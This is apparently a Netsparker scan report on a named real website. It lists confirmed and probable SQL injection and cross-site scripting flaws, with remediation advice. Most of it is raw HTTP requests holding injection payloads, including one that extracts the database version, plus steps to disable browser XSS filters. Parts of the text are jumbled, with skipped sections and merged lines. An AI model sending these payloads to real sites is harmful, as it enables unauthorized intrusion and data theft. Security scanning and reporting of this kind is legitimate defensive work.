3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheatsheet
Remedy References
MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP A1, PCI v1.2-6.5.2, PCI v2.0-6.5.1, CWE-89, CAPEC-66, WASC-19
1.1. /contact/ CONFIRMED
http://www.shalomlaam.co.il/contact/
Parameters
Parameter | Type | Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))
phone POST 3
sendFrom POST 3
subject POST 3
Extracted Data
microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation express edition on windows nt 5.2 (build 3790: service pack 2)
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 258
Accept-Encoding: gzip, deflate

action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3
Response
"Arial" size=2>Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
/contact/Default.asp, line 46
9 TOTAL CRITICAL
2. [Probable] SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, updating and deleting arbitrary data/tables from the database.
- Executing commands on the underlying operating system.
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of a DAL will help centralize the issue and its resolution. You can also use ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL injection based problems.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Monitor and review web logs and application logs to uncover active or previous exploitation attempts.
Remedy
A very robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to test for SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheat Sheet
Remedy References
SQL injection Prevention Cheat Sheet
MSDN - Protect From SQL injection in ASP.NET
OWASP Preventing SQL injection in Java
Prepared Statements and Stored Procedures in PHP
Classification
OWASP A1, PCI v1.2-6.5.2, PCI v2.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter | Type | Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST -1 or 1=1 and (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
subject POST 3
Certainty
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 438
Accept-Encoding: gzip, deflate

action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.2. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 434Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&name_id=0&phone=3&sendFrom=3&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.3. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
sendFrom POST 3
subject POST 3
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 289Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&sendFrom=3&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.4. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 438Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46
2.5. /reg/
http://www.shalomlaam.co.il/reg/
Parameters
Parameter Type Value
action POST add
bpdf POST 1
btn1 POST
email POST (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
f_name POST Smith
name POST Smith
phone POST 3
radio POST alon
Certainty
RequestPOST /reg/ HTTP/1.1Referer: http://www.shalomlaam.co.il/reg/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 270Accept-Encoding: gzip, deflate
action=add&bpdf=1&btn1=%ef%bf%bd%ef%bf%bd%ef%bf%bd&email=(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&f_name=Smith&name=Smith&phone=3&radio=alon
Responseyle="background:url('images/kiv.gif') repeat-x; width:100%; height:2px;">
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./reg/Default.asp, line 28
2.6. /contact/
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST -1 or 1=1 and (select 1 and row(1,1)>(selectcount(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))xfrom (select 1 union select 2)a group by xlimit 1))
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
Certainty
RequestPOST /contact/ HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 434Accept-Encoding: gzip, deflate
action=contact&f_name=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=3
Responsesrc="pic/logo.jpg" width="130" height="130" alt="" />-->
Microsoft OLE DB Provider for SQL Server error '80040e57'String or binary data would betruncated./contact/Default.asp, line 46-->
Microsoft OLE DB Provider for SQL Server error '80040e14'Incorrect syntax near '27'./contact/Default.asp, line 46
2.8. /lessons/
http://www.shalomlaam.co.il/lessons/
Parameters
Parameter Type Value
action POST search
yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
RequestPOST /lessons/ HTTP/1.1Referer: http://www.shalomlaam.co.il/lessons/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 220Accept-Encoding: gzip, deflate
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0
Responsetd>
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'[Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s
2.9. /lessons/default.asp
http://www.shalomlaam.co.il/lessons/default.asp
Parameters
Parameter Type Value
action POST search
yom POST '+ (selectconvert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
RequestPOST /lessons/default.asp HTTP/1.1Referer: http://www.shalomlaam.co.il/lessons/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 220Accept-Encoding: gzip, deflate
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)%20%2b'&snif=3&subjects=0
Responsetd>
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'[Microsoft][ODBC Excel Driver]The Microsoft Jet database engine could not find the object 'syscolumns'. Make s
150 TOTAL IMPORTANT CONFIRMED
150
3. Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Proof of Concept Notes
The generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below to disable XSS filtering for different browsers. Also note that:
XSS filtering is a feature that's enabled by default in some modern browsers. It should only be disabled temporarily to test exploits and should be re-enabled if the browser is actively used for purposes other than testing.
Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism; therefore a web application should not rely on this kind of client-side browser check.
Chrome
Open command prompt.
Go to folder where chrome.exe is located.
Run the command chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools->Internet Options and then navigate to the Security Tab.
Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled.
Set it to disabled. Click OK.
Click Yes to accept the warning followed by Apply.
Firefox
Go to about:config in the URL address bar.
In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
Set its value to false by double clicking the row.
Classification
OWASP A2, PCI v1.2-6.5.1, PCI v2.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1. /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0001D1)
RequestGET /allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:48:00 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/allvideo/'"-->netsparker(0x0001D1)script>style>alert(0x00049B)
RequestPOST /contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B) HTTP/1.1Referer: http://www.shalomlaam.co.il/contact/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 37Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:14 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 191Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp?'"-->netsparker(0x00049B)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:53 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/bmidrash/'"-->netsparker(0x0001C7)script>style>netsparker(0x0001CE)script>style>
3.8. /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/scr..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0001B7)
RequestGET /news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B7)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:29 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 164Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/news'"-->netsparker(0x0001B7)script>style>
3.10. /js/delate_image.asp CONFIRMEDhttp://www.shalomlaam.co.il/js/delate_image.asp?'"-->alert(0x0003D6)
ParametersParameter Type Value
field GET picture_
Query Based Query String '"-->alert(0x0003D6)
RequestGET /js/delate_image.asp?'"-->netsparker(0x0003D6) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:30 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 180Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/delate_image.asp?'"-->netsparker(0x0003D6)script>style>
RequestGET /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013F)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:38 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 166Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/pitgam'"-->netsparker(0x00013F)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:01:43 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/style/style.css'"-->netsparker(0x000452)script>style>netsparker(0x00012E)script>style>
3.17. /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/sc..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0004E9)
RequestGET /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E9)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:46 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/page/'"-->netsparker(0x0004E9)script>style>
RequestGET /about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00052F)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
